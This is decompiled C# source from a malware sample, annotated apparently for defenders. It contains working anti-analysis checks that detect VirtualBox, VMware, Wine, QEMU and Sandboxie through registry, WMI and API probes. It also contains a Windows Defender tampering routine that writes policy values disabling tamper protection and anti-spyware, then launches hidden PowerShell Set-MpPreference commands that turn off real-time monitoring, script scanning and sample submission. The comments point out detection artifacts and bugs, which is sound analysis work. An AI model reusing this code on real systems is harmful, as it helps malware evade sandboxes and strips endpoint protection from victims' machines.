  1. ===
/// <summary>
/// Virtualisation / emulator check from a decompiled sample; obfuscated names are kept as they were.
/// Returns true when any of the artifacts below points at VirtualBox, VMware, Wine or QEMU, and
/// false only after every check, including the closing WMI video-controller query, comes up clean.
/// Class0.smethod_0 is declared outside this listing; from its call sites it looks like a
/// registry-read helper taking (HKLM subkey path, value name) and returning the value as a string,
/// with "noValueButYesKey" as a sentinel for "key exists, value does not" — confirm in Class0.
/// For defenders, each branch is one registry read or one WMI query that appears verbatim in a
/// sandbox or API-monitor trace; the Win32_VideoController query is the noisiest of them.
/// </summary>
/// <returns>true if a VM/emulator artifact was found, otherwise false.</returns>
public static bool smethod_2()
{
  bool result;
  // VirtualBox: SCSI identifier, BIOS version strings, then the Guest Additions key.
  if (Class0.smethod_0("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VBOX"))
  {
    result = true;
  }
  else if (Class0.smethod_0("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("VBOX"))
  {
    result = true;
  }
  else if (Class0.smethod_0("HARDWARE\\Description\\System", "VideoBiosVersion").ToUpper().Contains("VIRTUALBOX"))
  {
    result = true;
  }
  // Sentinel comparison: the Guest Additions key exists even though no value was read from it.
  else if (Operators.CompareString(Class0.smethod_0("SOFTWARE\\Oracle\\VirtualBox Guest Additions", string.Empty), "noValueButYesKey", false) == 0)
  {
    result = true;
  }
  // VMware: SCSI identifiers on ports 0-2, the VMware Tools key and install path, the disk
  // enumeration string, and the display-adapter driver description.
  else if (Class0.smethod_0("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE"))
  {
    result = true;
  }
  else if (Operators.CompareString(Class0.smethod_0("SOFTWARE\\VMware, Inc.\\VMware Tools", string.Empty), "noValueButYesKey", false) == 0)
  {
    result = true;
  }
  else if (Class0.smethod_0("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 1\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE"))
  {
    result = true;
  }
  else if (Class0.smethod_0("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 2\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE"))
  {
    result = true;
  }
  // "vmware".ToUpper() evaluates to the same "VMWARE" the other branches use literally.
  else if (Class0.smethod_0("SYSTEM\\ControlSet001\\Services\\Disk\\Enum", "0").ToUpper().Contains("vmware".ToUpper()))
  {
    result = true;
  }
  // {4D36E968-E325-11CE-BFC1-08002BE10318} is the Display adapters device-class GUID; instance
  // 0000 is the first enumerated adapter.
  else if (Class0.smethod_0("SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000", "DriverDesc").ToUpper().Contains("VMWARE"))
  {
    result = true;
  }
  else if (Class0.smethod_0("SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\Settings", "Device Description").ToUpper().Contains("VMWARE"))
  {
    result = true;
  }
  else if (Class0.smethod_0("SOFTWARE\\VMware, Inc.\\VMware Tools", "InstallPath").ToUpper().Contains("C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\"))
  {
    result = true;
  }
  // Wine: its kernel32 exports wine_get_unix_file_name, which real Windows does not.
  else if (Class0.GetProcAddress(Class0.GetModuleHandle("kernel32.dll"), "wine_get_unix_file_name") != (IntPtr)0)
  {
    result = true;
  }
  // QEMU: SCSI identifier first, then the BIOS string.
  else if (Class0.smethod_0("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("QEMU"))
  {
    result = true;
  }
  // Note the inverted condition: a BIOS string containing "QEMU" skips this block and lands in
  // the final else (result = true); only a clean BIOS string reaches the WMI query.
  else if (!Class0.smethod_0("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("QEMU"))
  {
    // Last resort: enumerate video controllers through WMI and match known virtual adapters.
    // Only the result collection is disposed; the searcher itself is not.
    ManagementScope scope = new ManagementScope("\\\\.\\ROOT\\cimv2");
    using (ManagementObjectCollection managementObjectCollection = new ManagementObjectSearcher(scope, new ObjectQuery("SELECT * FROM Win32_VideoController")).Get())
    {
      foreach (ManagementBaseObject managementBaseObject in managementObjectCollection)
      {
        ManagementObject managementObject = (ManagementObject)managementBaseObject;
        // CompareString with textCompare=false is a binary (case-sensitive) exact match.
        // A null Description would throw NullReferenceException here; nothing in this method catches it.
        if (Operators.CompareString(managementObject["Description"].ToString(), "VM Additions S3 Trio32/64", false) == 0)
        {
          return true;
        }
        if (Operators.CompareString(managementObject["Description"].ToString(), "S3 Trio32/64", false) == 0)
        {
          return true;
        }
        if (Operators.CompareString(managementObject["Description"].ToString(), "VirtualBox Graphics Adapter", false) == 0)
        {
          return true;
        }
        if (Operators.CompareString(managementObject["Description"].ToString(), "VMware SVGA II", false) == 0)
        {
          return true;
        }
        if (managementObject["Description"].ToString().ToUpper().Contains("VMWARE"))
        {
          return true;
        }
        // An empty Description is also treated as a VM, so this branch trips on any host whose
        // controller reports no description — expect false positives when replaying the sample.
        if (Operators.CompareString(managementObject["Description"].ToString(), string.Empty, false) == 0)
        {
          return true;
        }
      }
    }
    result = false;
  }
  else
  {
    result = true;
  }
  return result;
}
  103. ===
/// <summary>
/// Sandbox / analysis-environment check from the same sample. Returns true when any of these
/// holds: Sandboxie's SbieDll.dll is loaded in this process; the current Windows user name
/// (read via GetUserName into a 50-character buffer, upper-cased) is one of a short list of
/// names; <paramref name="string_0"/> contains "\VIRUS", "SANDBOX" or "SAMPLE"; it equals
/// "C:\file.exe" exactly; or a top-level window of class "Afx:400000:0" exists.
/// </summary>
/// <param name="string_0">Presumably the running executable's path — the "C:\file.exe"
/// comparison suggests that; confirm at the caller.</param>
/// <returns>true if an analysis environment is suspected, otherwise false.</returns>
/// <remarks>
/// Operators.CompareString with textCompare=false is a binary (case-sensitive) comparison, so
/// the user-name checks only work because the buffer is upper-cased first, while the
/// "C:\file.exe" check is case-sensitive as written. Casting the IntPtr from GetModuleHandle or
/// FindWindow to int can throw OverflowException in a 64-bit process when the handle value does
/// not fit in 32 bits; nothing here catches it. For detection, the GetUserName /
/// GetModuleHandle("SbieDll.dll") / FindWindow("Afx:400000:0") sequence is a recognisable
/// API-trace pattern.
/// </remarks>
public static bool smethod_1(string string_0)
{
  StringBuilder stringBuilder = new StringBuilder();
  int num = 50;
  Class0.GetUserName(stringBuilder, ref num);
  return (int)Class0.GetModuleHandle("SbieDll.dll") != 0 || Operators.CompareString(stringBuilder.ToString().ToUpper(), "USER", false) == 0 || Operators.CompareString(stringBuilder.ToString().ToUpper(), "SANDBOX", false) == 0 || Operators.CompareString(stringBuilder.ToString().ToUpper(), "VIRUS", false) == 0 || Operators.CompareString(stringBuilder.ToString().ToUpper(), "MALWARE", false) == 0 || Operators.CompareString(stringBuilder.ToString().ToUpper(), "SCHMIDTI", false) == 0 || Operators.CompareString(stringBuilder.ToString().ToUpper(), "CURRENTUSER", false) == 0 || string_0.ToUpper().Contains("\\VIRUS") || string_0.ToUpper().Contains("SANDBOX") || string_0.ToUpper().Contains("SAMPLE") || Operators.CompareString(string_0, "C:\\file.exe", false) == 0 || (int)Class0.FindWindow("Afx:400000:0", (IntPtr)0) != 0;
}
  111. ===
  112. using System;
  113. using System.Diagnostics;
  114. using System.Security.Principal;
  115. using Microsoft.Win32;
  116.  
  117. // Token: 0x02000015 RID: 21
/// <summary>
/// Decompiled Windows Defender tampering routine (obfuscated names kept). When the process is
/// elevated it writes Defender policy values under HKLM and then walks the output of
/// Get-MpPreference, launching a powershell process for each protection that is still on.
/// Every step is a high-signal artifact for defenders: the writes under
/// HKLM\SOFTWARE\Policies\Microsoft\Windows Defender, the TamperProtection value write, and the
/// powershell.exe child processes whose command lines contain Set-MpPreference.
/// </summary>
internal static class Class13
{
  // Token: 0x06000045 RID: 69 RVA: 0x00003760 File Offset: 0x00001960
  /// <summary>
  /// Entry point. Gated on membership in the local Administrators role (the HKLM writes below
  /// need it); an unelevated run does nothing at all, which is why elevation is the precondition
  /// to watch for when this sample is observed.
  /// </summary>
  public static void smethod_0()
  {
    if (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
    {
      Class13.smethod_1("SOFTWARE\\Microsoft\\Windows Defender\\Features", "TamperProtection", "0");
      Class13.smethod_1("SOFTWARE\\Policies\\Microsoft\\Windows Defender", "DisableAntiSpyware", "1");
      Class13.smethod_1("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableBehaviorMonitoring", "1");
      Class13.smethod_1("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableOnAccessProtection", "1");
      Class13.smethod_1("SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", "DisableScanOnRealtimeEnable", "1");
      Class13.smethod_2();
    }
  }
 
  // Token: 0x06000046 RID: 70 RVA: 0x000037F0 File Offset: 0x000019F0
  /// <summary>
  /// Writes <paramref name="string_2"/> as a DWORD value named <paramref name="string_1"/> under
  /// HKLM\<paramref name="string_0"/>, creating the key when it does not exist. Every exception
  /// (access denied, missing permission, conversion failure) is swallowed silently.
  /// </summary>
  /// <param name="string_0">Subkey path relative to HKEY_LOCAL_MACHINE.</param>
  /// <param name="string_1">Value name.</param>
  /// <param name="string_2">Value as a string ("0" or "1" at every call site here); passed to
  /// SetValue with RegistryValueKind.DWord, which is expected to convert it to an Int32 — confirm
  /// against the target framework.</param>
  /// <remarks>
  /// <c>registryKey.GetValue(string_1) != string_2</c> compares the boxed object read back with a
  /// string by reference, so it is effectively always true and SetValue runs on every call; in
  /// practice the write is unconditional, which matters when building a registry-audit rule.
  /// </remarks>
  private static void smethod_1(string string_0, string string_1, string string_2)
  {
    try
    {
      using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(string_0, RegistryKeyPermissionCheck.ReadWriteSubTree))
      {
        if (registryKey == null)
        {
          // The key returned by CreateSubKey is never disposed.
          Registry.LocalMachine.CreateSubKey(string_0).SetValue(string_1, string_2, RegistryValueKind.DWord);
        }
        else if (registryKey.GetValue(string_1) != string_2)
        {
          registryKey.SetValue(string_1, string_2, RegistryValueKind.DWord);
        }
      }
    }
    catch
    {
      // Deliberate best-effort: any failure is ignored and leaves no trace in the sample's own output.
    }
  }
 
  // Token: 0x06000047 RID: 71 RVA: 0x0000386C File Offset: 0x00001A6C
  /// <summary>
  /// Runs <c>powershell Get-MpPreference -verbose</c> with redirected stdout and, for each output
  /// line describing a protection that is still enabled, launches a separate powershell process
  /// via smethod_3 to change it. The Process object is never disposed and the children spawned
  /// by smethod_3 are not awaited, so several may run concurrently.
  /// </summary>
  /// <remarks>
  /// The line matching is loose: <c>text.Contains("False")</c>, <c>!text.Contains("2")</c> and
  /// <c>!text.Contains("0")</c>/<c>"6"</c> test the whole formatted line, so any other digit or
  /// word in the line can satisfy or defeat a check. Process-creation telemetry — this process
  /// spawning powershell.exe with these exact command lines — is the most reliable detection
  /// point for this routine.
  /// </remarks>
  private static void smethod_2()
  {
    Process process = new Process
    {
      StartInfo = new ProcessStartInfo
      {
        FileName = "powershell",
        Arguments = "Get-MpPreference -verbose",
        UseShellExecute = false,
        RedirectStandardOutput = true,
        WindowStyle = ProcessWindowStyle.Hidden,
        CreateNoWindow = true
      }
    };
    process.Start();
    while (!process.StandardOutput.EndOfStream)
    {
      string text = process.StandardOutput.ReadLine();
      if (text.Contains("DisableRealtimeMonitoring") && text.Contains("False"))
      {
        Class13.smethod_3("Set-MpPreference -DisableRealtimeMonitoring $true");
      }
      else if (text.Contains("DisableBehaviorMonitoring") && text.Contains("False"))
      {
        Class13.smethod_3("Set-MpPreference -DisableBehaviorMonitoring $true");
      }
      else if (text.Contains("DisableBlockAtFirstSeen") && text.Contains("False"))
      {
        Class13.smethod_3("Set-MpPreference -DisableBlockAtFirstSeen $true");
      }
      else if (text.Contains("DisableIOAVProtection") && text.Contains("False"))
      {
        Class13.smethod_3("Set-MpPreference -DisableIOAVProtection $true");
      }
      else if (text.Contains("DisablePrivacyMode") && text.Contains("False"))
      {
        Class13.smethod_3("Set-MpPreference -DisablePrivacyMode $true");
      }
      else if (text.Contains("SignatureDisableUpdateOnStartupWithoutEngine") && text.Contains("False"))
      {
        Class13.smethod_3("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true");
      }
      else if (text.Contains("DisableArchiveScanning") && text.Contains("False"))
      {
        Class13.smethod_3("Set-MpPreference -DisableArchiveScanning $true");
      }
      else if (text.Contains("DisableIntrusionPreventionSystem") && text.Contains("False"))
      {
        Class13.smethod_3("Set-MpPreference -DisableIntrusionPreventionSystem $true");
      }
      else if (text.Contains("DisableScriptScanning") && text.Contains("False"))
      {
        Class13.smethod_3("Set-MpPreference -DisableScriptScanning $true");
      }
      // Numeric settings: the check is only "the line does not already contain this digit".
      else if (text.Contains("SubmitSamplesConsent") && !text.Contains("2"))
      {
        Class13.smethod_3("Set-MpPreference -SubmitSamplesConsent 2");
      }
      else if (text.Contains("MAPSReporting") && !text.Contains("0"))
      {
        Class13.smethod_3("Set-MpPreference -MAPSReporting 0");
      }
      else if (text.Contains("HighThreatDefaultAction") && !text.Contains("6"))
      {
        Class13.smethod_3("Set-MpPreference -HighThreatDefaultAction 6 -Force");
      }
      else if (text.Contains("ModerateThreatDefaultAction") && !text.Contains("6"))
      {
        Class13.smethod_3("Set-MpPreference -ModerateThreatDefaultAction 6");
      }
      else if (text.Contains("LowThreatDefaultAction") && !text.Contains("6"))
      {
        Class13.smethod_3("Set-MpPreference -LowThreatDefaultAction 6");
      }
      else if (text.Contains("SevereThreatDefaultAction") && !text.Contains("6"))
      {
        Class13.smethod_3("Set-MpPreference -SevereThreatDefaultAction 6");
      }
    }
  }
 
  // Token: 0x06000048 RID: 72 RVA: 0x00003B84 File Offset: 0x00001D84
  /// <summary>
  /// Launches a hidden <c>powershell</c> process with <paramref name="string_0"/> as its argument
  /// string and returns immediately, without waiting for it or disposing the Process object.
  /// UseShellExecute is left at its framework default here, unlike smethod_2.
  /// </summary>
  /// <param name="string_0">The PowerShell command line to run (a Set-MpPreference call at every call site in this class).</param>
  private static void smethod_3(string string_0)
  {
    Process process = new Process
    {
      StartInfo = new ProcessStartInfo
      {
        FileName = "powershell",
        Arguments = string_0,
        WindowStyle = ProcessWindowStyle.Hidden,
        CreateNoWindow = true
      }
    };
    process.Start();
  }
}
  254. ===